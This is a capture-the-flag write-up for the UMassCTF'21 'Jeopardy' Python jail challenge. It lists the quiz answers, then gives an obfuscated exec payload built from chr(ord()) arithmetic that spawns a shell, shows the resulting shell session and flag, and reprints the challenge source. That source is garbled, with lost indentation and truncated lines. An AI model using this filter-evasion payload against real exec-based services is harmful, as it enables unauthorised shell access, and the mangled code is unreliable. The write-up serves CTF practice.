# UMassCTF'21: Jeopardy

## Jeopardy

### Category: misc

#### 477 points

This is Jail-pardy!

nc 34.72.64.224 8082

nc 35.231.20.75 8082

There has been confusion over Miscellaneous 200. The answer is “ios”, it is misleading. My bad. Good luck and enjoy! :)

Created by Thomas (Seltzerz #6678)

Hint: For the 10000 point challenge, it’s in the first 30 minutes :)

## Solution

This challenge is a form of quiz + jail escape. For every correct answer we’re given one or more characters, which can be used in further python jailbreak.

``````Welcome to python jail-pardy! Each correctly answered question grants you characters which you can use try to break out
of this game with to get the flag.
When you answer a question correctly, the game will tell you which characters have been unlocked.
To attempt to breakout, instead of picking a question, type the word "jailbreak" instead.

----------------------------------------- Jeopardy! -----------------------------------------
UMass:  Cybersecurity Now:  Cybersecurity Yesterday:  Cybersecurity Tomorrow:  Miscellaneous:
100           100                     100                      100                 100
200           200                     200                      200                 200
300           300                     300                      300                 300
400           400                     400                      400                 400
500           500                     500                      500                 10000

``````Pick a category and dollar amount in the format of "category dollar amount" with no dollar sign from the board below
or type "jailbreak" to attempt to breakout of the game.

----------------------------------------- Jeopardy! -----------------------------------------
UMass:  Cybersecurity Now:  Cybersecurity Yesterday:  Cybersecurity Tomorrow:  Miscellaneous:
100           100                     100                      100                 100
200           200                     200                      200                 200
300           300                     300                      300                 300
400           400                     400                      400                 400
500           500                     500                      500                 10000``````

We (as an Inner Savages team) spent literally hours on seeking the answers.

Eventually we ended with below set:

``````UMass
100 - Sam
200 - Food
300 - Franklin
400 - Orchard Hill Area
Cybersecurity Now
100 - 39
200 - laser
400 - Microsoft
500 - dog
Cybersecurity Yesterday
100 - captain crunch
200 - Wargames
300 - Iran
400 - The Reaper
CyberSecurity Tommorow
100 - Quantum
200 - 2038
400 - arm
500 - deepfake
Miscellaneous
100 - TryHackMe
200 - ios
300 - 101010
400 - 4
10000 - gSH1GgcJHimHy0XaMn``````

Those answers gave me enough characters to attempt the jailbreak.

``jailbreak``
``````Input whatever you wish to try to break out of this game with in the following input.
Here are the characters you are allowed to use: ' ', '%', "'", '(', ')', '+', ',', '.', '1', ':', '<', ']', '_', '`', 'a
', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'm', 'n', 'o', 'p', 'q', 'r', 'w', 'x', 'y', 'z', '{', '}', '~'``````

I’ve decided to execute below code

``exec("import subprocess; subprocess.call(['sh'])")``

But, to do so I needed to get rid of the not allowed characters from payload. Main disadvantages were missing `t` and `s` letters. I’ve substituted them with `chr(ord('r')+1+1)` and `chr(ord('r')+1)` accordingly. Few others characters also were missing, I’ve used the same approach to them. Finally, I’ve successfully escaped using below payload:

``````exec('impor' + chr(ord('r')+1+1) + ' ' + chr(ord('r')+1) + chr(ord('r')+1+1+1) + 'bproce' + chr(ord('r')+1) + chr(ord('r
')+1) + chr(ord(':')+1) + ' ' + chr(ord('r')+1) + chr(ord('r')+1+1+1) + 'bproce' + chr(ord('r')+1) + chr(ord('r')+1) + '
.ca' + chr(ord('i')+1+1+1) + chr(ord('i')+1+1+1) + '(' + chr(ord('<')+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+
1+1+1+1+1+1) + chr(ord('%')+1+1) + chr(ord('r')+1) + 'h' + chr(ord('%')+1+1) + '])')``````

Got shell and found flag…

``````jailbreak
Input whatever you wish to try to break out of this game with in the following input.
Here are the characters you are allowed to use: ' ', '%', "'", '(', ')', '+', ',', '.', '1', ':', '<', ']', '_', '`', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'm', 'n', 'o', 'p', 'q', 'r', 'w', 'x', 'y', 'z', '{', '}', '~'
>>> exec('impor' + chr(ord('r')+1+1) + ' ' + chr(ord('r')+1) + chr(ord('r')+1+1+1) + 'bproce' + chr(ord('r')+1) + chr(ord('r')+1) + chr(ord(':')+1) + ' ' + chr(ord('r')+1) + chr(ord('r')+1+1+1) + 'bproce' + chr(ord('r')+1) + chr(ord('r')+1) + '.ca' + chr(ord('i')+1+1+1) + chr(ord('i')+1+1+1) + '(' + chr(ord('<')+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1) + chr(ord('%')+1+1) + chr(ord('r')+1) + 'h' + chr(ord('%')+1+1) + '])')
ls
flag.txt
jeopardy.py
ynetd
cat flag.txt
UMASS{thank-you-alex}``````

Aa a bonus I’ve captured the challenge python code to see all the correct answers.

``````import sys
import time
import os

def jailbreakattempt(allowedchars):
print('Input whatever you wish to try to break out of this game with in the following input.')
print('Here are the characters you are allowed to use: {}'.format(str(sorted(allowedchars))[1:-1]))
text = input('>>> ')
for char in text:
# print(char)
# print(allowedchars)
if char not in allowedchars:
print('You entered a character you are not allowed to use. Go answer more questions or rerun the game.')
return
try:
exec(text)
except:
print('Your input threw an exception. Try something different.')

def displaygb(gameboardboolean):
----------------------------------------- Jeopardy! -----------------------------------------
UMass:  Cybersecurity Now:  Cybersecurity Yesterday:  Cybersecurity Tomorrow:  Miscellaneous:
"""
gbqs = [
['', '', '', '', ''],
['', '', '', '', ''],
['', '', '', '', ''],
['', '', '', '', ''],
['', '', '', '', '']
]

gbqsprinted = ""

for i in range(5):
for j in range(5):
if j == 0 and i == 0:
gbqsprinted += " "
elif j == 0:
gbqsprinted += "     "
elif j == 1:
gbqsprinted += "           "
elif j == 2:
gbqsprinted += "                     "
elif j == 3:
gbqsprinted += "                      "
elif j == 4:
gbqsprinted += "                 "
gbqs[i][j] = gameboardboolean[i][j]['points']
gbqsprinted += str(gameboardboolean[i][j]['points'])
else:
gbqsprinted += "   "
gbqsprinted += '\n'

def main():
allowedchars = [' ']

# allowedchars = [chr(i) for i in range(128)]

a1 = {'chars': ['('], 'points': 100, 'question': 'What is the name of the mascot of UMass?',
a2 = {'chars': ['{'], 'points': 200, 'question': 'What is UMass most famously known for being #1 for?',
a3 = {'chars': ['}'], 'points': 300,
'question': 'What dining hall is hard-serve ice cream served at on campus everyday?',
a4 = {'chars': ['x'], 'points': 400, 'question': 'Where was the old honors college located?',
'answer': ['orchard hill', 'ohill', 'orchard hill area', 'orchard hill residential area'], 'answered': False}
a5 = {'chars': ['s', 't', 'u', 'v'], 'points': 500,
'question': 'This flag was raised from a dorm in the central housing area in the 90s due to unrest from the residents',

b1 = {'chars': [':'], 'points': 100,
'question': 'According to UMaryland Professor, a hacker attacks computers on average every ___ seconds?',
b2 = {'chars': [')'], 'points': 200,
'question': 'University of Michigan researchers controlled a Google Home from 230 feet away with what?',
b3 = {'chars': ['+'], 'points': 300,
'question': 'Band that was recently threatened to have unreleased music released unless they pay the hackers money',
b4 = {'chars': ['_', '<'], 'points': 400,
'question': 'This company recently had their source code accessed in a huge breach',
b5 = {'chars': ['p', 'q'], 'points': 500,
'question': 'What is a fairly new way to find electronics that law enforcement are using, i.e. Subway scandal',

c1 = {'chars': ['%'], 'points': 100, 'question': 'Nickname of one of the first "hackers" that is a cereal brand',
c2 = {'chars': ['1'], 'points': 200, 'question': 'Movie where tic-tac-toe used to save the world?',
c3 = {'chars': ['c'], 'points': 300,
'question': 'Country that US and Israeli has made multiple worms and malware against?',
c4 = {'chars': ['.'], 'points': 400,
'question': 'The first real use of cybersecurity against a virus was a program called the ___?',
c5 = {'chars': ['j', 'k', 'l'], 'points': 500, 'question': 'DoD wrote this during the cold war',

d1 = {'chars': ["'"], 'points': 100,
'question': 'This type of computing that has much promise for the future poses a great threat to encryption schemes commonly used today',
d2 = {'chars': ['e'], 'points': 200, 'question': 'This year will be the next y2k thanks to some data types',
d3 = {'chars': ['['], 'points': 300,
'question': 'Said to be the number 1 risk or threat in cybersecurity for the foreseeable future',
d4 = {'chars': [']'], 'points': 400,
'question': 'This architecture of CPUs seems to have many benefits but has repeatedly had vulnerabilities found in it after major releases of them',
d5 = {'chars': ['m', 'n', 'o'], 'points': 500,
'question': 'This technology that can be used to create fake events with real images is a serious concern for future cybersecurity',

e1 = {'chars': ['`'], 'points': 100, 'question': 'Name a sponsor of UMassCTF',
e2 = {'chars': ['r'], 'points': 200, 'question': 'This was the most popular OS that was used in 2020',
e3 = {'chars': ['h'], 'points': 300,
'question': 'The answer to the life, universe, everything? In binary, of course.', 'answer': ['101010'],
e4 = {'chars': [',', '~'], 'points': 400,
'question': 'If there are 6 apples and you take away 4, how many do you have?', 'answer': ['4'],
e5 = {'chars': ['a', 'b', 'd', 'f', 'g', 'i', 'w', 'y', 'z'], 'points': 10000,
'question': 'The UMass Cybersecurity club holds many talks from a wide variety of industry '
'professionals in the tech scene. One such company may have leaked a password to '
'something they were demoing during their presentation but did not care. What was'

gameboardboolean = [
[a1, b1, c1, d1, e1],
[a2, b2, c2, d2, e2],
[a3, b3, c3, d3, e3],
[a4, b4, c4, d4, e4],
[a5, b5, c5, d5, e5]
]

displaygb(gameboardboolean)

print('Terminating program.')
sys.exit(0)

totalquestions = 25
exitprogram = 0
while totalquestions >= 1:
try:
print(
'\nPick a category and dollar amount in the format of "category dollar amount" with no dollar sign from the board below')
print('or type "jailbreak" to attempt to breakout of the game.')
displaygb(gameboardboolean)
questionpick = input().lower()
if questionpick == 'exit':
print('Terminating program now')
exitprogram = 1
break
if questionpick == 'jailbreak':
jailbreakattempt(allowedchars)
print("\nYou are back in the game loop. I hope it wasn't too easy...")
continue
if len(questionpick.split(" ")) < 2 or not questionpick.split(" ")[-1].isdigit():
print('Please provide a category and dollar amount')
continue
category = ""
for i in questionpick.split(" ")[0:-1]:
category += i + " "
category = category[0:-1]
dollaramount = questionpick.split(" ")[-1]
if int(dollaramount) != 100 and int(dollaramount) != 200 and int(dollaramount) != 300 and int(
dollaramount) != 400 and int(dollaramount) != 500 and int(dollaramount) != 10000:
print('Provide a valid dollar amount')
continue
arrayrow = int((int(questionpick.split(" ")[-1]) / 100) - 1)
if category == 'umass':
currentquestion = gameboardboolean[arrayrow]
elif category == 'cybersecurity now':
currentquestion = gameboardboolean[arrayrow]
elif category == 'cybersecurity yesterday':
currentquestion = gameboardboolean[arrayrow]
elif category == 'cybersecurity tomorrow':
currentquestion = gameboardboolean[arrayrow]
elif category == 'miscellaneous':
if questionpick.split(" ")[-1] == '10000':
currentquestion = gameboardboolean
else:
currentquestion = gameboardboolean[arrayrow]
else:
print('Not a valid category.')
continue

continue
else:
print(currentquestion['question'])
print('Correct! You have been awarded the following characters: {}'.format(
str(currentquestion['chars'])[1:-1]))
for i in currentquestion['chars']:
allowedchars.append(i)
else:
print('No, sorry. If you wish to try again you will have to restart the game entirely.')
totalquestions -= 1
time.sleep(2)
except:
print("An error occurred. Play the game as it was meant to be played, please :)")

if exitprogram != 1:
print(
'You have now attempted to answer all the questions. You can either exit this game by typing "exit" or continually attempt to jailbreak.')
while True:
try:
finished = input()
if finished == 'jailbreak':
jailbreakattempt(allowedchars)
elif finished == 'exit':
print('Exiting now')
break
else:
print('Invalid argument passed. Either type "jailbreak" or restart the game.')
except:
print('An error has occurred. Play the game it was meant to be played, please :)')

if __name__ == '__main__':
print(
'Welcome to python jail-pardy! Each correctly answered question grants you characters which you can use try to break out of this game with to get the flag.')
print('When you answer a question correctly, the game will tell you which characters have been unlocked.')
print('To attempt to breakout, instead of picking a question, type the word "jailbreak" instead.')
main()``````

## Flag

`UMASS{thank-you-alex}`